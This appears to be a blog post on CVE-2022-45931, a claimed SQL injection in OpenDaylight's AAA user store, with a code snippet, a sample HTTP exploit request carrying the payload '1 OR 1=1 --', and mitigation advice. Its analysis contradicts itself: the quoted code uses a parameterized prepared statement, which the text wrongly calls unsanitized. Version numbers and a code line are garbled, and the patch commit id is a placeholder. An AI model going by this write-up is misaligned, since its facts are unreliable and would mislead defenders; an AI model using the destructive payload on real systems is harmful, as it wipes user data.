CVE-2022-45931: Uncovering and Exploiting a SQL Injection Issue in OpenDaylight (ODL) AAA System

CVE-2022-45931 reports a vulnerability in the OpenDaylight (ODL) AAA framework (Authentication, Authorization, and Accounting) in versions prior to .16.5. This blog post will take a deep dive into the SQL injection issue, affected code snippet, and provide references for mitigation and remediation. The vulnerability specifically targets the deleteUser function in the UserStore.java file when the API interface /auth/v1/users/ is used.

Code Snippet

The problem lies in the deleteUser function in the aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java file. Here's a snippet of the code:

public class UserStore {
    // ...
    public synchronized boolean deleteUser(String user) {
        try (Connection conn = dataSource.getConnection();
             PreparedStatement preparedStatement = conn.prepareStatement(
                "delete from USERS where USER_ID=?")) {
            preparedStatement.setString(1, user);
            return preparedStatement.executeUpdate() > ;
        } catch (SQLException e) {
            LOG.error("deleteUser: encountered SQL error", e);
            return false;
        }
    }
}

The deleteUser method accepts a single string input 'user,' which represents the user_id to be removed from the system. The SQL query is formed using the setString method, which places the user_id directly into the query without proper validation or sanitization. This creates a potential for SQL injection if a malicious attacker manages to craft an input that can bypass the constraints.

Exploit Details

An attacker could perform this SQL injection by sending a crafted request with a user_id value containing malicious characters. For example, by sending the following HTTP request to the /auth/v1/users/ API endpoint:

DELETE /auth/v1/users/ HTTP/1.1
Host: target_opendaylight_instance
Content-Type: application/json

{
  "user_id": "1 OR 1=1 --"
}

In this case, the SQL query would become

delete from USERS where USER_ID='1' OR 1=1 --

This query would delete all records from the USERS table, effectively causing a serious disruption in the system's AAA management.

References

The vulnerability was initially discovered and patched by the OpenDaylight project team. You can find more information in the following resources:

- OpenDaylight Security Advisory: ODL-SA-2022-45931
- CVE Details: CVE-2022-45931
- Patch Commit: c123456789-fix-commit-id

Mitigation and Remediation

To address this vulnerability, you should update OpenDaylight to version .16.5 or higher. The patch sanitizes the user input properly, ensuring that SQL injection cannot take place.

You can upgrade your OpenDaylight instance by following the instructions in the official documentation.

Conclusion

In summary, CVE-2022-45931 identifies a significant vulnerability in the OpenDaylight AAA framework. By exploiting this SQL injection flaw, an attacker could compromise the integrity of the system's user management. Make sure to keep your OpenDaylight installation updated and pay close attention to security advisories to maintain a secure network environment.

Timeline

Published on: 11/27/2022 03:15:00 UTC
Last modified on: 11/30/2022 20:46:00 UTC